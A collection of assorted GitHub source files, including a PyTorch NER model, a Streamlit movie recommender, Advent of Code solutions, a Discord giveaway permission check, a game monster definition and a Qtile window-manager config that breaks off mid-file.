+{"seq_id":"22271083811","text":"import torch\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nfrom torch import nn, optim\nfrom torchcrf import CRF\n\nfrom transformers import RobertaModel\n\n\nclass LstmNerModel(nn.Module):\n def __init__(self, embedding_size=256, num_tags=41,\n vocab_size=3675, hidden_size=128,\n batch_first=True, dropout=0.1):\n super(LstmNerModel, self).__init__()\n self.batch_first = batch_first\n self.embedding = nn.Embedding(vocab_size, embedding_size, dtype=torch.float32)\n\n self.lstm = nn.LSTM(embedding_size, hidden_size // 2,\n num_layers=2, batch_first=True,\n bidirectional=True, dropout=dropout)\n for name, param in self.lstm.named_parameters():\n if name.startswith(\"weight\"):\n nn.init.xavier_normal_(param)\n else:\n nn.init.zeros_(param)\n\n self.fc = nn.Linear(hidden_size, num_tags)\n self.crf = CRF(num_tags, batch_first=True)\n\n def forward(self, input_tensor, seq_lens):\n input_tensor = self.embedding(input_tensor)\n total_length = input_tensor.size(1) if self.batch_first else input_tensor.size(0)\n input_packed = pack_padded_sequence(input_tensor, seq_lens, batch_first=self.batch_first, enforce_sorted=False)\n output_lstm, hidden = self.lstm(input_packed)\n output_lstm, length = pad_packed_sequence(output_lstm, batch_first=self.batch_first, total_length=total_length)\n output_fc = self.fc(output_lstm)\n return output_fc\n\n def compute_loss(self, input_tensor, tags, seq_lens):\n mask = torch.zeros(input_tensor.shape[:2])\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n output_fc = self.forward(input_tensor, seq_lens)\n\n loss = -self.crf(output_fc, tags, mask, reduction='mean')\n return loss\n\n def decode(self, input_tensor, seq_lens):\n out = self.forward(input_tensor, seq_lens)\n mask = torch.zeros(input_tensor.shape[:2])\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n predicted_index = self.crf.decode(out, mask)\n return predicted_index\n\n\nclass BertNerModel(nn.Module):\n def __init__(self,\n\n num_tags=41,\n batch_first=True,\n ):\n super(BertNerModel, self).__init__()\n self.batch_first = batch_first\n\n self.model = RobertaModel.from_pretrained(\"hfl/chinese-roberta-wwm-ext\")\n self.fc = nn.Linear(768, num_tags)\n self.crf = CRF(num_tags, batch_first=True)\n\n def forward(self, input_tensor):\n input_tensor = self.model(input_tensor)\n input_tensor = self.fc(input_tensor.last_hidden_state)\n return input_tensor\n\n def compute_loss(self, input_tensor, tags):\n mask = torch.zeros(input_tensor.shape[:2])\n if torch.cuda.is_available():\n mask = mask.to('cuda')\n mask = torch.greater(input_tensor, mask).type(torch.cuda.ByteTensor)\n else:\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n\n output = self.forward(input_tensor)\n loss = -self.crf(output, tags, mask, reduction='mean')\n return loss\n\n def decode(self, input_tensor):\n out = self.forward(input_tensor)\n mask = torch.zeros(input_tensor.shape[:2])\n if torch.cuda.is_available():\n mask = mask.to('cuda')\n mask = torch.greater(input_tensor, mask).type(torch.cuda.ByteTensor)\n else:\n mask = torch.greater(input_tensor, mask).type(torch.ByteTensor)\n\n predicted_index = self.crf.decode(out, mask)\n return predicted_index\n","repo_name":"liwenju0/chinese_ner_bert_lstm_crf","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"44800500923","text":"\"\"\"\n\n Streamlit webserver-based Recommender Engine.\n\n Author: Explore Data Science Academy.\n\n Note:\n ---------------------------------------------------------------------\n Please follow the instructions provided within the README.md file\n located within the root of this repository for guidance on how to use\n this script correctly.\n\n NB: !! Do not remove/modify the code delimited by dashes !!\n\n This application is intended to be partly marked in an automated manner.\n Altering delimited code may result in a mark of 0.\n ---------------------------------------------------------------------\n\n Description: This file is used to launch a minimal streamlit web\n\tapplication. You are expected to extend certain aspects of this script\n and its dependencies as part of your predict project.\n\n\tFor further help with the Streamlit framework, see:\n\n\thttps://docs.streamlit.io/en/latest/\n\n\"\"\"\n# Streamlit dependencies\nimport streamlit as st\nimport joblib,os\n\n# Data handling dependencies\nimport pandas as pd\nimport numpy as np\nimport streamlit.components.v1 as components\nimport plotly.figure_factory as ff\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\n\n\n# Custom Libraries\nfrom utils.data_loader import load_movie_titles\nfrom recommenders.collaborative_based import collab_model\nfrom recommenders.content_based import content_model\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\n# Data Loading\ntitle_list = load_movie_titles('resources/data/movies.csv')\n\n# App declaration\ndef main():\n\n html_template = \"\"\"\n
\n
EDSA Movie Recommendation Challenge
\n
UNSUPERVISED LEARNING PREDICT - TEAM1
\n
\n \"\"\"\n\n title_template =\"\"\"\n
\n
UNSUPERVISED LEARNING PREDICT
\n
TEAM 1
\n
Malibongwe Xulu
\n
Nthabiseng Moela
\n
Simangele Maphanga
\n
Kgauhelo Mokgawa
\n
Manko Mofokeng
\n
14 December 2020
\n
\n \"\"\"\n\n # DO NOT REMOVE the 'Recommender System' option below, however,\n # you are welcome to add more options to enrich your app.\n page_options = [\"Home\",\"Recommender System\",\"About\",\"Exploratory Data Analysis\",\"Solution Overview\"]\n\n # -------------------------------------------------------------------\n # ----------- !! THIS CODE MUST NOT BE ALTERED !! -------------------\n # -------------------------------------------------------------------\n page_selection = st.sidebar.selectbox(\"Choose Option\", page_options)\n if page_selection == \"Recommender System\":\n # Header contents\n st.write('# Movie Recommender Engine')\n st.write('### EXPLORE Data Science Academy Unsupervised Predict')\n st.image('resources/imgs/Image_header.png',use_column_width=True)\n # Recommender System algorithm selection\n sys = st.radio(\"Select an algorithm\",\n ('Content Based Filtering',\n 'Collaborative Based Filtering'))\n\n # User-based preferences\n st.write('### Enter Your Three Favorite Movies')\n movie_1 = st.selectbox('First Option',title_list[14930:15200])\n movie_2 = st.selectbox('Second Option',title_list[25055:25255])\n movie_3 = st.selectbox('Third Option',title_list[21100:21200])\n fav_movies = [movie_1,movie_2,movie_3]\n\n # Perform top-10 movie recommendation generation\n if sys == 'Content Based Filtering':\n if st.button(\"Recommend\"):\n with st.spinner('Crunching the numbers...'):\n top_recommendations = content_model(movie_list=fav_movies,\n top_n=10)\n st.title(\"We think you'll like:\")\n for i,j in enumerate(top_recommendations):\n st.subheader(str(i+1)+'. '+j)\n\n\n\n if sys == 'Collaborative Based Filtering':\n if st.button(\"Recommend\"):\n with st.spinner('Crunching the numbers...'):\n top_recommendations = collab_model(movie_list=fav_movies,\n top_n=10)\n st.title(\"We think you'll like:\")\n for i,j in enumerate(top_recommendations):\n st.subheader(str(i+1)+'. '+j)\n\n\n\n # -------------------------------------------------------------------\n\n # ------------- SAFE FOR ALTERING/EXTENSION -------------------\n \n if page_selection == \"Home\":\n st.markdown(html_template.format('royalblue','white'), unsafe_allow_html=True)\n st.image('resources/imgs/Home.PNG',use_column_width=True) \n #st.markdown(title_template, unsafe_allow_html=True)\n\n if page_selection == \"About\":\n #markup(page_selection)\n st.write(\"### Oveview: Flex your Unsupervised Learning skills to generate movie recommendations\")\n \n # You can read a markdown file from supporting resources folder\n #if st.checkbox(\"Introduction\"):\n st.subheader(\"Introduction to Unsupervised Learning Predict\")\n st.write(\"\"\"In today’s technology driven world, recommender systems are socially and economically critical for ensuring that individuals can make appropriate choices surrounding the content they engage with on a daily basis. One application where this is especially true surrounds movie content recommendations; where intelligent algorithms can help viewers find great titles from tens of thousands of options.\"\"\")\n st.write(\"\"\"With this context, EDSA is challenging you to construct a recommendation algorithm based on content or collaborative filtering, capable of accurately predicting how a user will rate a movie they have not yet viewed based on their historical preferences.\"\"\")\n st.write(\"\"\"Providing an accurate and robust solution to this challenge has immense economic potential, with users of the system being exposed to content they would like to view or purchase - generating revenue and platform affinity.\"\"\")\n\n #if st.checkbox(\"Problem Statement\"):\n st.subheader(\"Problem Statement of the Unsupervised Learning Predict\")\n st.write(\"Build recommender systems to recommend a movie\")\n\n #if st.checkbox(\"Data\"):\n st.subheader(\"Data Overview\")\n st.write(\"\"\"This dataset consists of several million 5-star ratings obtained from users of the online MovieLens movie recommendation service. The MovieLens dataset has long been used by industry and academic researchers to improve the performance of explicitly-based recommender systems, and now you get to as well!\"\"\")\n\n st.write(\"\"\"For this Predict, we'll be using a special version of the MovieLens dataset which has enriched with additional data, and resampled for fair evaluation purposes.\"\"\")\n\n st.write(\"\"\"### Source:\"\"\") \n st.write(\"\"\"The data for the MovieLens dataset is maintained by the GroupLens research group in the Department of Computer Science and Engineering at the University of Minnesota. Additional movie content data was legally scraped from IMDB\"\"\")\n\n\n st.write(\"\"\"### Supplied Files:\n genome_scores.csv - a score mapping the strength between movies and tag-related properties. Read more here\n\n genome_tags.csv - user assigned tags for genome-related scores\n\n imdb_data.csv - Additional movie metadata scraped from IMDB using the links.csv file.\n\n links.csv - File providing a mapping between a MovieLens ID and associated IMDB and TMDB IDs.\n\n sample_submission.csv - Sample of the submission format for the hackathon.\n\n tags.csv - User assigned for the movies within the dataset.\n\n test.csv - The test split of the dataset. Contains user and movie IDs with no rating data.\n\n train.csv - The training split of the dataset. Contains user and movie IDs with associated rating data.\"\"\")\n\n # st.subheader(\"Raw Twitter data and label\")\n # if st.checkbox('Show raw data'): # data is hidden if box is unchecked\n # st.write(raw[['sentiment', 'message']]) # will write the df to the page\n\n if page_selection == \"Exploratory Data Analysis\":\n st.title('Exploratory Data Analysis')\n\n if st.checkbox(\"ratings\"):\n st.subheader(\"Movie ratings\")\n st.image('resources/imgs/rating.PNG',use_column_width=True)\n\n # if st.checkbox(\"correlation\"):\n # st.subheader(\"Correlation between features\")\n # st.image('resources/imgs/correlation.png',use_column_width=True)\n \n if st.checkbox(\"genre wordcloud\"):\n st.subheader(\"Top Genres\")\n st.image('resources/imgs/genre_wordcloud.png',use_column_width=True)\n \n if st.checkbox(\"genres\"):\n st.subheader(\"Top Genres\")\n st.image('resources/imgs/top_genres.PNG',use_column_width=True)\n \n # if st.checkbox(\"movies released per year\"):\n # st.subheader(\"Movies released per year\")\n # st.image('resources/imgs/release_year.png',use_column_width=True)\n\n if st.checkbox(\"tags\"):\n st.subheader(\"Top tags\")\n st.image('resources/imgs/top_tags.PNG',use_column_width=True)\n\n if st.checkbox(\"cast\"):\n st.subheader(\"Popular cast\")\n st.image('resources/imgs/cast.PNG',use_column_width=True)\n\n # if page_selection == \"Recommend a movie\":\n # st.title(\"Recommend a movie\")\n # sys = st.radio(\"Select an algorithm\",\n # ('Content Based Filtering',\n # 'Collaborative Based Filtering'))\n\n\n if page_selection == \"Solution Overview\":\n st.title(\"Solution Overview\")\n st.write(\"RMSE of the recommendation models to show their performance\")\n st.image('resources/imgs/performance_df.PNG',use_column_width=True)\n\n\n # You may want to add more sections here for aspects such as an EDA,\n # or to provide your business pitch.\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Simangele101/unsupervised-predict-streamlit-template","sub_path":"edsa_recommender.py","file_name":"edsa_recommender.py","file_ext":"py","file_size_in_byte":10562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"70591919475","text":"# https://www.tutorialspoint.com/python/tk_button.htm\nfrom tkinter import *\nimport time\n\nroot = Tk()\nroot.geometry('500x300+1000+500')\n\n\n# 1st Example\ndef check_time():\n btn_time['text'] = time.strftime('%H:%M:%S')\n print(time.strftime('%H:%M:%S'))\n\n\nbtn_time = Button(root, text='Check Time', command=check_time)\nbtn_time.pack()\n\n\n# 2nd Example\nroot.title('Counter')\nclicks = 0\n\n\ndef counter():\n global clicks\n clicks += 1\n root.title(f'Counter: {clicks}')\n\n\nbtn_cnt = Button(root, text='Counter', command=counter)\nbtn_cnt.pack()\n\n\nroot.mainloop()\n","repo_name":"bigalex95/tkinterExamples","sub_path":"tkinter/tkinterExamples/lesson3/lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"73097507955","text":"# -*- coding:UTF-8 -*-\n\"\"\"\nTrain models and show the results\n@author: ZhaoHe\n\"\"\"\nimport os\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nfrom src.data import Data\nfrom src.config import train_path, test_path, submission_sample, submission_dir, images_dir\nfrom src.classifiers import classifier_xgboost, classifier_dicisionTree, classifier_SVM\nfrom src.clusters import cluster_KMeans, cluster_Hierarchical, cluster_Spectral\n\ndef get_submission(pred, model_name):\n submission_df = pd.read_csv(submission_sample, header=0)\n for i in range(len(pred)):\n submission_df.ix[i,'Survived'] = pred[i]\n out_file = os.path.join(submission_dir, model_name)\n submission_df.to_csv(out_file, index=False)\n\ndef pca(X_multi_dim):\n pca_model = PCA(n_components=2)\n X_2_dim = pca_model.fit_transform(X_multi_dim)\n return X_2_dim\n\ndef plot_result(pca_X, label_Y, title):\n class0_x, class0_y = [], []\n class1_x, class1_y = [], []\n for i in range(len(pca_X)):\n if label_Y[i] == 0:\n class0_x.append(pca_X[i][0])\n class0_y.append(pca_X[i][1])\n elif label_Y[i] == 1:\n class1_x.append(pca_X[i][0])\n class1_y.append(pca_X[i][1])\n plt.plot(class0_x, class0_y, 'or', label='No-Survived')\n plt.plot(class1_x, class1_y, 'ob', label='Survived')\n plt.title(title)\n plt.legend()\n plt.savefig(os.path.join(images_dir, title))\n plt.close()\n\n\ndef train_models(train_X, train_Y, test_X):\n # Classify using Xgboost\n pred_Y = classifier_xgboost(train_X, train_Y, test_X)\n get_submission(pred_Y, 'xgboost')\n\n # Classify using decisionTree\n pred_Y = classifier_dicisionTree(train_X, train_Y, test_X)\n get_submission(pred_Y, 'decisionTree')\n\n # Classify using SVM\n pred_Y = classifier_SVM(train_X, train_Y, test_X)\n get_submission(pred_Y, 'SVM')\n\n # Cluster using KMeans\n pred_Y = cluster_KMeans(train_X, test_X)\n get_submission(pred_Y, 'KMeans')\n\n # Cluster using Herichical\n pred_Y = cluster_Hierarchical(test_X)\n get_submission(pred_Y, 'Hierachical')\n\n # Cluster using Spectral\n pred_Y = cluster_Spectral(test_X)\n get_submission(pred_Y, 'Spectral')\n\ndef visualize_models(train_X, train_Y, test_X):\n # PCA on X\n new_train_X = pca(train_X)\n new_test_X = pca(test_X)\n\n # Visualize the train set\n plot_result(new_train_X, train_Y, 'Train Set')\n\n # Visualize the Xgboost\n sub_file = os.path.join(submission_dir, 'Xgboost')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'Xgboost')\n\n # Visualize the decisionTree\n sub_file = os.path.join(submission_dir, 'decisionTree')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'DecisionTree')\n\n # Visualize the SVM\n sub_file = os.path.join(submission_dir, 'SVM')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'SVM')\n\n # Visualize the KMeans\n sub_file = os.path.join(submission_dir, 'KMeans')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'KMeans')\n\n # Visualize the Hierachical\n sub_file = os.path.join(submission_dir, 'Hierachical')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'Hierahical')\n\n # Visualize the Spectral\n sub_file = os.path.join(submission_dir, 'Spectral')\n data = pd.read_csv(sub_file, header=0)\n label_y = data['Survived']\n plot_result(new_test_X, label_y, 'Spectral')\n\n\n\n\nif __name__ == \"__main__\":\n data = Data()\n train_X, train_Y = data.load_data(train_path)\n test_X = data.load_data(test_path, train = False)\n\n #train_models(train_X, train_Y, test_X)\n visualize_models(train_X, train_Y, test_X)","repo_name":"zhaohe1995/BIT2018-DataMiningHomework","sub_path":"Homework3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"44877835735","text":"n = int(input())\nmistakes = 0\ncorrectdict = {}\nfor i in range(n):\n x, s = input().split()\n correctdict[x] = s\nfor i in range(n):\n x,s = input().split()\n if sorted(correctdict[x]) != sorted(s):\n mistakes += 1\n \nprint(mistakes)","repo_name":"nikhiljsk/Programming","sub_path":"Competitive Prog/Hackerearth/cyphsept/hungryowleagle.py","file_name":"hungryowleagle.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"19233097341","text":"__author__ = 'jacob'\nimport pyvtk, math, os\nfrom glob import glob\nimport numpy\n#import visit_writer\n\nfilename = 'chymera_data.vtk'\ntitle = 'Test CHYMERA Output'\n\n\nNX = 256\nNZ = 66\nNY = 128\n\n\ndef BlendPoint(A, B, t):\n return [(1. - t) * A[0] + t * B[0], (1. - t) * A[1] + t * B[1], (1. - t) * A[2] + t * B[2]]\n\n\ndef GetMeshPoints(angle, angle2):\n p = []\n for k in range(NZ):\n z = float(k) / float(NZ - 1)\n for j in range(NY):\n y = float(j) / float(NY - 1)\n for i in range(NX):\n x = float(i) / float(NX - 1)\n A = [y * math.cos(angle), y * math.sin(angle), z]\n B = [y * math.cos(angle2), y * math.sin(angle2), z]\n p += BlendPoint(A, B, x)\n return p\n\n\ndef GetMeshConnectivity():\n c = []\n for k in range(NZ - 1):\n for j in range(NY - 1):\n for i in range(NX - 1):\n # Make a hole\n if i == 1 and j == 2:\n continue\n\n i0 = k * NY * NX + j * NX + i\n i1 = k * NY * NX + j * NX + (i + 1)\n i2 = k * NY * NX + (j + 1) * NX + (i + 1)\n i3 = k * NY * NX + (j + 1) * NX + i\n\n i4 = (k + 1) * NY * NX + j * NX + i\n i5 = (k + 1) * NY * NX + j * NX + (i + 1)\n i6 = (k + 1) * NY * NX + (j + 1) * NX + (i + 1)\n i7 = (k + 1) * NY * NX + (j + 1) * NX + i\n\n c.append([i0, i1, i2, i3, i4, i5, i6, i7])\n return c\n\n\ndef ReadGridData(filename):\n grid_data = []\n with open(filename, 'r') as data_file:\n for line in data_file:\n grid_data.append(float(line))\n return grid_data\n\n\ndef GetGridData():\n '''\n Gets the data from the output of binaryReader\n :return: A list of lists of grid data\n '''\n grid_data = []\n set_of_grids = glob(pathname=\"./GridData*.txt\")\n print(\"Getting Grid Data\")\n for grid in set_of_grids:\n grid_data.append(ReadGridData(grid))\n print(\"Finished GridData\")\n return grid_data\n\n\ndef GetMetaData():\n filename = os.path.join(\"MetaDataVTK.txt\")\n meta_data = ReadGridData(filename=filename)\n return meta_data\n\n\ndef WriteProxyDataset():\n filename = \"chymeraData.visit\"\n with open(filename, \"wt\") as all_data:\n all_data.write(\"!NBLOCKS 360\\n\")\n\n #f = open(\"test.visit\", \"wt\")\n #f.write(\"!NBLOCKS 360\\n\")\n # Get the mesh 6 times and add it all up.\n #all_pts = []\n #size_of_grid = NZ*NX*NY\n #connections_size = 8*size_of_grid\n #print(connections_size)\n #points_size = 3*size_of_grid\n # Create memmaps to deal with Python running out of memory\n #all_conn = numpy.memmap(os.path.join(\"/media/jacob/New Volume/\",\"connections.memmap\"), mode=\"w+\", dtype=\"int\", shape=(connections_size, connections_size))\n #all_pts = numpy.memmap(\"points.memmap\", mode=\"w+\", dtype=\"float16\", shape=(points_size, points_size))\n #all_var = []\n #pts_length = 0\n #conn_length = 0\n values = GetGridData()\n for i in range(360):\n pts = []\n conn = []\n angle = math.radians(float(i) * 1.)\n angle2 = math.radians(float(i + 1) * 1.)\n pts += GetMeshPoints(angle, angle2)\n conn += GetMeshConnectivity()\n var = []\n grid = pyvtk.UnstructuredGrid(points=pts, hexahedron=conn)\n print(\"Finished Unstructured Grid\")\n # Get the GridData\n end_point = int(i + (len(pts) - 1 / 3))\n print(int(i + ((len(pts) -1) / 3)))\n celldata = pyvtk.CellData(pyvtk.Scalars(values[0][i:end_point], name=\"data1\"),\n pyvtk.Scalars(values[1][i:end_point], name=\"data2\"),\n pyvtk.Scalars(values[2][i:end_point], name=\"data3\"),\n pyvtk.Scalars(values[3][i:end_point], name=\"data4\"),\n pyvtk.Scalars(values[4][i:end_point], name=\"data5\"),)\n\n vtk = pyvtk.VtkData(grid, celldata, title)\n vtk.tofile(\"chymera%d.vtk\\n\" % i)\n all_data.write(\"chymera%d\\n\" % i)\n print(\"Done in i range\" + str(i))\n\n\nWriteProxyDataset()","repo_name":"jacobbieker/chymera-vis","sub_path":"chymeraToVTK.py","file_name":"chymeraToVTK.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"26225827723","text":"from .universal import ContainerMeta\n\n\nclass LEVY_AREA_APPROXIMATIONS(metaclass=ContainerMeta): # noqa\n none = \"none\" # Don't compute any Levy area approximation\n space_time = \"space-time\" # Only compute an (exact) space-time Levy area\n davie = \"davie\" # Compute Davie's approximation to Levy area\n foster = (\n \"foster\" # Compute Foster's correction to Davie's approximation to Levy area\n )\n","repo_name":"DrownFish19/PaddleXDE","sub_path":"paddlexde/utils/sde_settings.py","file_name":"sde_settings.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"33638472355","text":"from datetime import date \n\narchivo = open(\"repaso/M2/nacidos.csv\")\nl = archivo.readlines()\naP = 1998\nl.pop(0)\n\nfor personas in l:\n pC = personas.find(\",\")\n aN = int(personas[pC+1:pC+5])\n mN = int(personas[pC+6:pC+8])\n dN = int(personas[pC+9:pC+11])\n fechaNac = date(aN,mN, dN)\n veranoInicio = date(aP-1, 12, 21)\n veranoFin = date(aP, 3, 20)\n if veranoInicio <= fechaNac <= veranoFin:\n print(personas[:-1])\n","repo_name":"pablokan/22prog1","sub_path":"repaso/M2/pr8.py","file_name":"pr8.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"74834036273","text":"import argparse\n\nimport pytest\nfrom support import timing\n\n\ndef compute(s):\n schedule = [x for x in s.splitlines()[1].split(\",\")]\n bus_ids = [int(x) for x in schedule if x != \"x\"]\n (step, t) = bus_ids[0], 0\n for b in bus_ids[1:]:\n while (t + schedule.index(str(b))) % b:\n t += step\n step *= b\n return t\n\n\n@pytest.mark.parametrize(\n ('input_s', 'expected'),\n (\n (\"\"\"123\n7,13,x,x,59,x,31,19\"\"\", 1068781),\n (\"\"\"123\n17,x,13,19\"\"\", 3417),\n (\"\"\"234\n1789,37,47,1889\"\"\", 1202161486),\n ),\n)\ndef test(input_s, expected):\n assert compute(input_s) == expected\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('data_file')\n args = parser.parse_args()\n\n with open(args.data_file) as f, timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"itallix/advent-of-code-2020","sub_path":"day13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"22741683324","text":"from utils.custom_context import MyContext\nfrom ..settings.get_setting import get_setting\nfrom ..errors import NotManager, NoGiveawayPermissions\nfrom bot import MetroBot\n\nimport discord\nfrom discord.ext import commands\n\n\ndef giveaway_manager_check():\n async def predicate(ctx: MyContext):\n\n manager = await get_setting(ctx.bot, 'manager', ctx.guild.id)\n\n role = ctx.guild.get_role(manager) # manager can be none and this will still work\n if not role:\n if not ctx.author.guild_permissions.manage_guild:\n raise NoGiveawayPermissions(f'You need `Manage Guild` permissions to use this.')\n else:\n if not role in ctx.author.roles and not ctx.author.guild_permissions.manage_guild:\n raise NotManager(f'You need to be a giveaway manager (<@&{manager}>) to use this.')\n return True\n return commands.check(predicate)\n\nasync def giveaway_manager_check_interaction(bot: MetroBot, interaction: discord.Interaction,):\n \"\"\"Check if `Interaction.user` is a giveaway manager.\"\"\"\n manager = await get_setting(bot, 'manager', interaction.guild_id)\n\n role = interaction.guild.get_role(manager) # manager can be none and this will still work\n if not role:\n if not interaction.user.guild_permissions.manage_guild:\n await interaction.followup.send(f'You need `Manage Guild` permissions to use this.', ephemeral=True)\n return False\n else:\n if not role in interaction.user.roles and not interaction.user.guild_permissions.manage_guild:\n await interaction.followup.send(f'You need to be a giveaway manager (<@&{manager}>) to use this.', ephemeral=True)\n return False\n return True\n \n","repo_name":"dartmern/metro","sub_path":"cogs/giveaway_rewrite/checks/manager_check.py","file_name":"manager_check.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"39"}
+{"seq_id":"24028963834","text":"mutated_bat = genMonster(\"Mutated Bat\", 307, 9829)\nmutated_bat.health(900)\nmutated_bat.type(\"blood\")\nmutated_bat.defense(armor=20, fire=1, earth=0, energy=1, ice=1, holy=1, death=0, physical=1, drown=0)\nmutated_bat.experience(615)\nmutated_bat.speed(245)\nmutated_bat.behavior(summonable=0, hostile=True, illusionable=False, convinceable=0, pushable=False, pushItems=True, pushCreatures=True, targetDistance=1, runOnHealth=300)\nmutated_bat.walkAround(energy=0, fire=0, poison=0)\nmutated_bat.immunity(paralyze=1, invisible=1, lifedrain=1, drunk=1)\nmutated_bat.voices(\"Shriiiiiek\")\nmutated_bat.melee(169, condition=CountdownCondition(CONDITION_POISON, 6), conditionChance=100)\nmutated_bat.loot( (2148, 100, 130), (\"star herb\", 5.0), (\"rusty armor\", 13.0, 2), (\"battle shield\", 7.75), (\"obsidian lance\", 7.0), (\"bat wing\", 7.75, 3), (\"mutated bat ear\", 5.0), (\"energy ring\", 1.0), (\"small amethyst\", 0.75, 2), (\"black pearl\", 1.75, 3), (\"batwing hat\", 0.0025), (\"mercenary sword\", 0.0025), (\"black shield\", 0.0025) )","repo_name":"VAPus/PyOT-Legacy","sub_path":"data/monsters/Mammals/Mutated/Mutated Bat.py","file_name":"Mutated Bat.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"}
+{"seq_id":"1638052124","text":"import sys\n\ni = 0\nnomes={}\nfor s in sys.stdin:\n\tx = s.split()\n\tnomes[i] = []\n\tfor j in x:\n\t\tnomes[i].append(j)\n\ti+=1\n\nx = sorted(nomes.items(), key=lambda x: (len(x[1]),x[1])) # adiciona espacos nos nomes do meio\nfor i in range(len(x)):\n\tfor j in range(len(x[i][1])-1):\n\t\tx[i][1][j]+=' '\n\nl = len(x)\nfor y in x:\n\txx = y[1]\n\tfor i in range(len(xx)):\n\t\tsys.stdout.write(xx[i])\n\tprint\n\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","repo_name":"JoGomes19/LA2","sub_path":"Torneio1 - 20/nome.py","file_name":"nome.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"7526432539","text":"######################################################################\n\n# __ _ ___ _ _ #\n# /\\ \\ \\ ___ (_) ____ / __\\ ___ __| |(_) _ __ __ _ #\n# / \\/ // _ \\ | ||_ /_____ / / / _ \\ / _` || || '_ \\ / _` | #\n# / /\\ /| (_) || | / /|_____|/ /___| (_) || (_| || || | | || (_| | #\n# \\_\\ \\/ \\___/ |_|/___| \\____/ \\___/ \\__,_||_||_| |_| \\__, | #\n# |___/ #\n\n######################################################################\n\nfrom libqtile import bar, layout, widget\nfrom libqtile.config import Click, Drag, Group, Key, Match, Screen\nfrom libqtile.lazy import lazy\nfrom libqtile.utils import guess_terminal\nfrom qtile_extras import widget\nfrom qtile_extras.widget.decorations import PowerLineDecoration\n\nmod = \"mod4\"\nterminal = guess_terminal()\n\npowerline = {\n \"decorations\": [\n PowerLineDecoration(path=\"forward_slash\",\n size=7)\n ]\n}\n\nkeys = [\n Key([mod], \"h\", lazy.layout.left(), desc=\"Move focus to left\"),\n Key([mod], \"l\", lazy.layout.right(), desc=\"Move focus to right\"),\n Key([mod], \"j\", lazy.layout.down(), desc=\"Move focus down\"),\n Key([mod], \"k\", lazy.layout.up(), desc=\"Move focus up\"),\n Key([mod], \"m\", lazy.window.toggle_maximize(), desc=\"Toggle maximize windows\"),\n Key([mod], \"space\", lazy.layout.next(), desc=\"Move window focus to other window\"),\n Key([mod, \"shift\"], \"h\", lazy.layout.shuffle_left(), desc=\"Move window to the left\"),\n Key([mod, \"shift\"], \"l\", lazy.layout.shuffle_right(), desc=\"Move window to the right\"),\n Key([mod, \"shift\"], \"j\", lazy.layout.shuffle_down(), desc=\"Move window down\"),\n Key([mod, \"shift\"], \"k\", lazy.layout.shuffle_up(), desc=\"Move window up\"),\n Key([mod, \"control\"], \"h\", lazy.layout.grow_left(), desc=\"Grow window to the left\"),\n Key([mod, \"control\"], \"l\", lazy.layout.grow_right(), desc=\"Grow window to the right\"),\n Key([mod, \"control\"], \"j\", lazy.layout.grow_down(), desc=\"Grow window down\"),\n Key([mod, \"control\"], \"k\", lazy.layout.grow_up(), desc=\"Grow window up\"),\n Key([mod], \"n\", lazy.layout.normalize(), desc=\"Reset all window sizes\"),\n Key(\n [mod, \"shift\"],\n \"Return\",\n lazy.layout.toggle_split(),\n desc=\"Toggle between split and unsplit sides of stack\",\n ),\n Key([mod], \"Return\", lazy.spawn(\"kitty\"), desc=\"Launch terminal\"),\n Key([mod], \"Tab\", lazy.next_layout(), desc=\"Toggle between layouts\"),\n Key([mod], \"w\", lazy.window.kill(), desc=\"Kill focused window\"),\n Key([mod, \"control\"], \"r\", lazy.reload_config(), desc=\"Reload the config\"),\n Key([mod, \"control\"], \"q\", lazy.shutdown(), 